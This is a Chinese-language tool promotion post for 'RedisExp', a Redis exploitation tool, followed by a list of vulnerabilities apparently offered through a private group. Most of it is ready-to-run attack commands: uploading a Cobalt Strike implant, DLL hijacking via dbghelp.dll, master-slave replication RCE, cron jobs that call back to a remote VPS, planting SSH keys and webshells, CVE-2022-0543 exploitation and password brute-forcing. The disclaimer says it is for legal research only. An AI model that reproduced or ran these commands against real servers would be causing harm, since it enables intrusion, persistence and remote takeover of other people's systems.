0x01 工具介绍
RedisExp 是一个用于利用 Redis 漏洞的多功能工具,支持执行 Redis 命令、主从复制、DLL/SO 加载、文件上传、计划任务写入、SSH 公钥配置等操作。该工具允许用户通过不同的模块实现远程命令执行、上传恶意文件以及劫持 DLL。它适用于研究 Redis 安全漏洞,仅供合法的安全研究使用,不承担非法用途的责任。
下载地址在末尾
0x02 功能简介
功能
exp.dll 和 exp.so 已经把内容分别加载到 dll.go 和 so.go 可以直接调用。
在写入webshell的时候因为有一些特殊字符,可以使用把webshell进行 base64 编码,然后使用 -b 参数来解码
有空格的目录或文件同时使用双引号和单引号 "'a b'"
关闭Redis压缩(写入乱码的时候可以关闭压缩,工具在写入shell的时候默认添加了关闭压缩,写入后再恢复开启压缩)
config set rdbcompression no
stop-writes-on-bgsave-error 默认为 yes, 如果 Redis 开启了 RDB 持久化并且最后一次失败了,Redis 默认会停止写入,让用户意识到数据的持久化没有正常工作。临时的解决方案是 conf set stop-writes-on-bgsave-error 设置为 no,只是让程序暂时忽略了这个问题,但是数据的持久化的问题并没有。(工具会默认设置为 no ,等工具退出的时候再重新设置回原来的值yes)
config set stop-writes-on-bgsave-error no
dll 劫持
利用dbghelp.dll:
上传 cs 马
.RedisEXP.exe -m upload -r 127.0.0.1 -p 6378 -w 123456 -L 127.0.0.1 -P 2222 -rp c:userspublic -rf test.exe -lf artifact.exe
上传 dbghelp.dll 到 redis-server.exe 所在目录进行劫持
.RedisEXP.exe -m upload -r 127.0.0.1 -p 6378 -w 123456 -L 127.0.0.1 -P 2222 -rp . -rf dbghelp.dll -lf dbghelp.dll
触发dll劫持
.RedisEXP.exe -m bgsave -r 127.0.0.1 -p 6378 -w 123456
生成gohper
RedisExp.exe -m gopher -r 目标IP -p 目标端口 -f gopher模板文件
写shell模板
config set dir /tmp
config set dbfilename shell.php
set 'webshell' '<?php phpinfo();?>'
bgsave
报错
工具报错:[ERR Error loading the extension. Please check the server logs.] module load /tmp/exp.so
服务端报错:Module /tmp/exp.so failed to load: It does not have execute permissions.
有可能是 Redis 版本太高, exp.so 没有执行权限导致加载不了。具体需要查看服务端的报错
0x03更新说明
load 加载dll 或 so 执行命令
cli 执行redis命令功能
0x04 使用介绍
详细命令使用:-h 查看
██████╗ ███████╗██████╗ ██╗███████╗ ███████╗██╗ ██╗██████╗
██╔══██╗██╔════╝██╔══██╗██║██╔════╝ ██╔════╝╚██╗██╔╝██╔══██╗
██████╔╝█████╗ ██║ ██║██║███████╗ █████╗ ╚███╔╝ ██████╔╝
██╔══██╗██╔══╝ ██║ ██║██║╚════██║ ██╔══╝ ██╔██╗ ██╔═══╝
██║ ██║███████╗██████╔╝██║███████║ ███████╗██╔╝ ██╗██║
╚═╝ ╚═╝╚══════╝╚═════╝ ╚═╝╚══════╝ ╚══════╝╚═╝ ╚═╝╚═╝
基本连接:
RedisExp.exe -r 192.168.19.1 -p 6379 -w 123456
执行Redis命令:
RedisExp.exe -m cli -r 192.168.19.1 -p 6379 -w 123456 -c info
加载dll或so执行命令:
RedisExp.exe -m load -r 目标IP -p 目标端口 -w 密码 -rf (目标 dll | so 文件名)
RedisEXP.exe -m load -r 127.0.0.1 -p 6379 -rf exp.dll -n system -t system.exec
主从复制命令执行:
RedisExp.exe -m rce -r 目标IP -p 目标端口 -w 密码 -L 本地IP -P 本地Port [-c whoami 单次执行] -rf 目标文件名[exp.dll | exp.so (Linux)]
RedisEXP.exe -m rce -r 127.0.0.1 -p 6379 -L 127.0.0.1 -P 2222 -c whoami
RedisEXP.exe -m rce -r 127.0.0.1 -p 6379 -L 127.0.0.1 -P 2222 -c whoami -rf exp.so
主从复制上传文件:
RedisExp.exe -m upload -r 目标IP -p 目标端口 -w 密码 -L 本地IP -P 本地Port -rp 目标路径 -rf 目标文件名 -lf 本地文件
RedisEXP.exe -m upload -r 127.0.0.1 -p 6379 -L 127.0.0.1 -P 2222 -rp . -rf 1.txt -lf .README.md
主动关闭主从复制:
RedisExp.exe -m close -r 目标IP -p 目标端口 -w 密码
写计划任务:
RedisExp.exe -m cron -r 目标IP -p 目标端口 -w 密码 -L VpsIP -P VpsPort
RedisEXP.exe -m cron -r 192.168.1.8 -p 6379 -L 192.168.1.8 -P 9001
写SSH 公钥:
RedisExp.exe -m ssh -r 目标IP -p 目标端口 -w 密码 -u 用户名 -s 公钥
RedisEXP.exe -m ssh -r 192.168.1.8 -p 6379 -u root -s ssh-aaaaaaaaaaaaaa
写webshell:
RedisExp.exe -m shell -r 目标IP -p 目标端口 -w 密码 -rp 目标路径 -rf 目标文件名 -s Webshell内容 [base64内容使用 -b 来解码]
RedisEXP.exe -m shell -r 127.0.0.1 -p 6379 -rp . -rf shell.txt -s MTIzNA== -b
CVE-2022-0543:
RedisExp.exe -m cve -r 目标IP -p 目标端口 -w 密码 -c 执行命令
爆破Redis密码:
RedisExp.exe -m brute -r 目标IP -p 目标端口 -f 密码字典
RedisEXP.exe -m brute -r 127.0.0.1 -p 6378 -f pass.txt
生成gohper:
RedisExp.exe -m gopher -r 目标IP -p 目标端口 -f gopher模板文件
执行 bgsave:
RedisExp.exe -m bgsave -r 目标IP -p 目标端口 -w 密码
判断文件(需要绝对路径):
RedisExp.exe -m dir -r 目标IP -p 目标端口 -w 密码 -rf c:windowswin.ini
0x05 内部星球9月新增漏洞
upload文件上传漏洞
H3C CVM upload前台任意文件上传漏洞
H3C CVM fileUploadfd前台任意文件上传漏洞
Nacos未授权下载配置信息漏洞
网御VPN安全网关存在任意文件下载漏洞(CNVD-2024-34014)
用友U8CRM系统接口relobjreportlistphp存在SQL注入漏洞
资产管理运营系统ticket存在SQL注入漏洞
_requestPost接口任意文件读取漏洞
thinkphp最新CVE-2024-44902反序列化漏洞
接口存在SQL注入漏洞
天融信运维安全审计系统synRequest存在远程命令执行漏洞
loginsso sql注入漏洞
AC集中管理平台未授权漏洞
王道4S管理系统GetKuCunInfo存在SQL注入漏洞
wxselect SQL注入漏洞
TaskCarToQueueaspx SQL注入漏洞
GetImg 任意文件读取漏洞
index 任意文件读取漏洞
智慧平台PersonalDayInOutSchoolData存在SQL注入漏洞
cmseasy index 信息泄露漏洞
泛微OA前台sql注入获取管理员密码漏洞
getOrderStatus SQL注入漏洞
ThirdTimeSyn 远程命令执行漏洞
RelMediaFindById SQL注入漏洞
win 任意文件读取漏洞
WriteAllBytes 任意文件上传漏洞
深大智能科技有限公司管控平台服务端Download存在任意文件读取漏洞
UploadFileWordTemplate 文件上传致RCE漏洞
Array Networks APV应用交付系统 RCE漏洞
operater-action sql注入
syn 信息泄露漏洞
Base64Upload存在任意文件上传漏洞
视频监控存在任意文件读取漏洞
武汉地大信息工程股份有限公司基础信息平台GetImg存在任意文件读取漏洞
DownloadInpFile 任意文件读取漏洞
接口存在SQL注入漏洞
VIEWGOOD-getUser-sql注入漏洞
Jenkins-Remoting任意文件读取漏洞(CVE-2024-43044)
用友U8-Cloud多个接口SQL注入漏洞
WordPress插件GiveWP存在反序列漏洞(CVE-2024-5932)
华望云会议管理平台多处存在SQL注入漏洞
housesavephp SQL注入漏洞
北京朗新天霁sTalent人力资源系统-GetTokey信息泄露漏洞
NUUO摄像头存在命令执行漏洞
深大智能科技有限公司管控平台服务端UploadFile存在任意文件上传漏洞
index sql注入漏洞
Hoverfly simulation 任意文件读取漏洞复现(CVE-2024-45388)
唯徳知识产权产权系统DownloadFileWordTemplate存在任意文件读取漏洞
顺景ERP管理系统UploadInvtSpFile任意文件上传漏洞
Crocus devicestate sql注入漏洞
jc6 DownLoadBgImage接口存在文件读取漏洞
NUUO摄像头存在任意文件读取漏洞
CRM chkServicephp SQL注入漏洞
login 远程命令执行漏洞
任意文件上传漏洞
officeserver接口sql注入漏洞
热网无线监测系统GetMenuItem存在SQL注入漏洞
信息泄露漏洞
Oracle JDEdwards EnterpriseOne Tools未授权获取管理员密码漏洞
smanga get-file-flow 文件读取漏洞
com-sksoft-common-portal XXE漏洞
ModeDateService sql注入漏洞
upload-fcgi 任意文件上传
get 信息泄露
锐明Crocus系统存在敏感信息泄漏漏洞
万户ezOFFICE协同管理平台filesendcheck_gd存在SQL注入漏洞
com-ufida-web-action sql注入
山东思达特测控设备有限公司热网无线监测系统GetDataKindByType存在SQL注入漏洞
浪潮云财务系统UploadListFileashx存在任意文件上传漏洞
东胜物流软件SubCompSeaeDefAdapterSQL注入漏洞
jc6 oaplusrangedownloadfile接口存在文件读取漏洞
多企源基础数据支撑系统checkLoginaction存在SQL注入漏洞
短剧影视小程序多个漏洞
EOVA未授权doInit接口存在反序列化漏洞
紫光电子档案管理系统selectFileRemote存在SQL注入漏洞
Outlook远程代码执行漏洞
物联网平台 任意文件下载漏洞
Cloud show_download_content接口权限绕过存在SQL注入漏洞
Ivanti Virtual Traffic Manager存在身份验证绕过漏洞(CVE-2024-7593)
某仿soul欲音社交系统存在任意文件读取漏洞
众诚网上订单系统o_sa_orderashx存在SQL注入漏洞
0x06
推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
还没有评论,来说两句吧...